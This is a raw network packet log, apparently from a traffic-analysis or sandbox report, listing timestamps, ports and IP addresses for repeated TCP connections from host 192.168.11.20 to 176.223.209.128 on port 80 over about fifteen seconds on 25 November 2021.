Nov 25, 2021 10:49:23.271222115 CET	49983	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.305210114 CET	80	49983	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.323570013 CET	80	49983	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.323591948 CET	80	49983	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.323932886 CET	49983	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.323956013 CET	49983	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.358005047 CET	80	49983	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.715861082 CET	49984	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.749166965 CET	80	49984	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.749372959 CET	49984	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.750983953 CET	49984	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.784322977 CET	80	49984	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.784497976 CET	49984	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.817819118 CET	80	49984	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.836504936 CET	80	49984	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.836565018 CET	80	49984	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.836950064 CET	49984	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.836999893 CET	49984	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.870420933 CET	80	49984	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.225574017 CET	49985	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.259735107 CET	80	49985	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.259955883 CET	49985	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.261506081 CET	49985	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.295533895 CET	80	49985	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.295780897 CET	49985	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.329818964 CET	80	49985	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.345724106 CET	80	49985	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.345771074 CET	80	49985	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.345956087 CET	49985	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.346004009 CET	49985	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.380212069 CET	80	49985	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.729454041 CET	49986	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.763555050 CET	80	49986	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.763783932 CET	49986	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.765311003 CET	49986	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.799510002 CET	80	49986	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.799844980 CET	49986	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.834184885 CET	80	49986	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.850509882 CET	80	49986	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.850574970 CET	80	49986	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:24.850785971 CET	49986	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.850857019 CET	49986	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:24.885062933 CET	80	49986	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.235157967 CET	49987	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.268532991 CET	80	49987	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.268824100 CET	49987	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.270320892 CET	49987	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.303586960 CET	80	49987	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.303807974 CET	49987	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.337326050 CET	80	49987	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.354125023 CET	80	49987	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.354190111 CET	80	49987	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.354545116 CET	49987	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.354640961 CET	49987	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.388226986 CET	80	49987	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.747864962 CET	49988	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.781227112 CET	80	49988	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.781487942 CET	49988	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.783039093 CET	49988	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.816476107 CET	80	49988	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.816695929 CET	49988	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.850167990 CET	80	49988	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.870491982 CET	80	49988	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.870543003 CET	80	49988	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:25.870764971 CET	49988	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.870815992 CET	49988	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:25.904381990 CET	80	49988	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.281141996 CET	49989	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.315174103 CET	80	49989	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.315421104 CET	49989	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.316917896 CET	49989	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.350821972 CET	80	49989	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.351032019 CET	49989	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.384963036 CET	80	49989	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.402348042 CET	80	49989	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.402398109 CET	80	49989	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.402909994 CET	49989	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.402961016 CET	49989	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.436994076 CET	80	49989	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.806636095 CET	49990	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.839704990 CET	80	49990	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.839809895 CET	49990	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.841394901 CET	49990	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.874515057 CET	80	49990	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.874670982 CET	49990	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.907936096 CET	80	49990	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.926106930 CET	80	49990	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.926156044 CET	80	49990	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:26.926378965 CET	49990	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.926428080 CET	49990	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:26.959842920 CET	80	49990	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.322037935 CET	49991	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.356153011 CET	80	49991	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.356408119 CET	49991	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.357925892 CET	49991	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.391942024 CET	80	49991	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.392189026 CET	49991	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.426306963 CET	80	49991	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.442270994 CET	80	49991	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.442326069 CET	80	49991	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.442522049 CET	49991	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.442574024 CET	49991	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.476787090 CET	80	49991	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.825756073 CET	49992	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.859936953 CET	80	49992	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.860193968 CET	49992	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.861742973 CET	49992	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.895981073 CET	80	49992	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.896306038 CET	49992	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.930481911 CET	80	49992	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.946178913 CET	80	49992	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.946233034 CET	80	49992	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:27.946454048 CET	49992	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.946516037 CET	49992	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:27.980779886 CET	80	49992	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.367882967 CET	49993	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.401221037 CET	80	49993	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.401382923 CET	49993	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.402900934 CET	49993	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.436007977 CET	80	49993	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.436259985 CET	49993	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.469614983 CET	80	49993	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.491888046 CET	80	49993	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.491945982 CET	80	49993	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.492145061 CET	49993	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.492196083 CET	49993	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.525645971 CET	80	49993	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.890279055 CET	49994	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.924377918 CET	80	49994	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.924711943 CET	49994	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.926177979 CET	49994	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.960311890 CET	80	49994	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:28.960627079 CET	49994	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:28.994894981 CET	80	49994	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.014986992 CET	80	49994	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.015075922 CET	80	49994	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.015239954 CET	49994	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.015317917 CET	49994	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.049514055 CET	80	49994	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.360337973 CET	49995	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.393449068 CET	80	49995	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.393609047 CET	49995	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.395169020 CET	49995	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.428313017 CET	80	49995	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.428569078 CET	49995	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.461925030 CET	80	49995	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.493921041 CET	80	49995	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.493994951 CET	80	49995	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.494340897 CET	49995	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.494400024 CET	49995	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.527827024 CET	80	49995	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.836508036 CET	49996	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.869821072 CET	80	49996	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.869970083 CET	49996	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.871512890 CET	49996	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.904974937 CET	80	49996	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.905167103 CET	49996	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.938534975 CET	80	49996	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.953989983 CET	80	49996	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.954037905 CET	80	49996	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:29.954180956 CET	49996	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.954229116 CET	49996	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:29.987550974 CET	80	49996	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.357810974 CET	49997	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.391750097 CET	80	49997	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.391943932 CET	49997	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.393507004 CET	49997	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.427620888 CET	80	49997	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.427990913 CET	49997	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.462239027 CET	80	49997	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.483016968 CET	80	49997	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.483103991 CET	80	49997	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.483297110 CET	49997	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.483362913 CET	49997	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.517658949 CET	80	49997	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.887756109 CET	49998	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.921143055 CET	80	49998	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.921289921 CET	49998	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.922836065 CET	49998	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.956120014 CET	80	49998	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:30.956326962 CET	49998	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:30.989833117 CET	80	49998	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.011261940 CET	80	49998	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.011318922 CET	80	49998	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.011461973 CET	49998	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.011514902 CET	49998	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.045098066 CET	80	49998	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.396119118 CET	49999	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.430274010 CET	80	49999	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.430485964 CET	49999	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.432080984 CET	49999	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.466058969 CET	80	49999	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.466260910 CET	49999	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.500297070 CET	80	49999	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.517405033 CET	80	49999	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.517461061 CET	80	49999	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.517630100 CET	49999	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.517683983 CET	49999	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.551955938 CET	80	49999	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.915703058 CET	50000	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.949150085 CET	80	50000	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.949338913 CET	50000	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.950901031 CET	50000	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:31.984229088 CET	80	50000	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:31.984535933 CET	50000	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.017851114 CET	80	50000	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.039340973 CET	80	50000	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.039350986 CET	80	50000	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.039566994 CET	50000	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.039577007 CET	50000	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.072685003 CET	80	50000	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.376384974 CET	50001	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.409694910 CET	80	50001	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.409925938 CET	50001	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.411503077 CET	50001	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.444618940 CET	80	50001	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.444843054 CET	50001	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.478028059 CET	80	50001	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.494329929 CET	80	50001	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.494345903 CET	80	50001	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.494529009 CET	50001	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.494544983 CET	50001	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.527656078 CET	80	50001	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.803136110 CET	50002	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.836556911 CET	80	50002	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.836705923 CET	50002	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.838212013 CET	50002	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.871540070 CET	80	50002	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.871723890 CET	50002	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.905139923 CET	80	50002	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.929130077 CET	80	50002	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.929179907 CET	80	50002	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:32.929322958 CET	50002	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.929374933 CET	50002	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:32.963000059 CET	80	50002	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.335028887 CET	50003	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.369271040 CET	80	50003	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.369491100 CET	50003	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.371009111 CET	50003	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.405152082 CET	80	50003	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.405335903 CET	50003	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.439356089 CET	80	50003	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.455444098 CET	80	50003	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.455492020 CET	80	50003	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.455658913 CET	50003	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.455707073 CET	50003	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.489814997 CET	80	50003	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.855689049 CET	50004	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.889184952 CET	80	50004	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.889503956 CET	50004	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.891068935 CET	50004	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.924413919 CET	80	50004	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.924673080 CET	50004	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.958009958 CET	80	50004	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.998054981 CET	80	50004	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.998104095 CET	80	50004	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:33.998327971 CET	50004	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:33.998363972 CET	50004	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.031747103 CET	80	50004	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.384495974 CET	50005	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.418601990 CET	80	50005	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.418859005 CET	50005	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.420368910 CET	50005	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.454376936 CET	80	50005	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.454618931 CET	50005	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.488661051 CET	80	50005	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.506170988 CET	80	50005	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.506190062 CET	80	50005	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.506423950 CET	50005	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.506434917 CET	50005	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.540160894 CET	80	50005	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.886154890 CET	50006	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.919903994 CET	80	50006	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.920078039 CET	50006	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.921608925 CET	50006	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.955363035 CET	80	50006	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:34.955773115 CET	50006	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:34.989592075 CET	80	50006	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.006596088 CET	80	50006	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.006613016 CET	80	50006	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.006757021 CET	50006	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.006774902 CET	50006	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.040663004 CET	80	50006	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.346673965 CET	50007	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.379743099 CET	80	50007	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.380012989 CET	50007	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.381644964 CET	50007	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.414865017 CET	80	50007	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.415180922 CET	50007	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.448530912 CET	80	50007	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.470386028 CET	80	50007	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.470464945 CET	80	50007	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.470659971 CET	50007	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.470720053 CET	50007	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.504225969 CET	80	50007	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.864382029 CET	50008	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.897907019 CET	80	50008	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.898200035 CET	50008	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.899719000 CET	50008	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.933121920 CET	80	50008	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.933382034 CET	50008	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.966747999 CET	80	50008	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.990776062 CET	80	50008	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.990827084 CET	80	50008	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:35.990998983 CET	50008	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:35.991051912 CET	50008	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.024584055 CET	80	50008	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.394860983 CET	50009	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.429003954 CET	80	50009	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.429305077 CET	50009	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.430850029 CET	50009	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.464824915 CET	80	50009	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.465001106 CET	50009	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.499233007 CET	80	50009	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.515178919 CET	80	50009	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.515234947 CET	80	50009	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.515428066 CET	50009	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.515510082 CET	50009	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.549856901 CET	80	50009	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.905332088 CET	50010	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.939306021 CET	80	50010	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.939526081 CET	50010	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.941066980 CET	50010	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:36.975054979 CET	80	50010	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:36.975271940 CET	50010	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.009290934 CET	80	50010	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.025207996 CET	80	50010	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.025258064 CET	80	50010	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.025456905 CET	50010	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.025509119 CET	50010	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.059792042 CET	80	50010	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.448103905 CET	50011	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.482224941 CET	80	50011	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.482476950 CET	50011	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.484066010 CET	50011	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.518081903 CET	80	50011	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.518367052 CET	50011	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:37.552386045 CET	80	50011	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.573867083 CET	80	50011	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:37.573915958 CET	80	50011	176.223.209.128	192.168.11.20
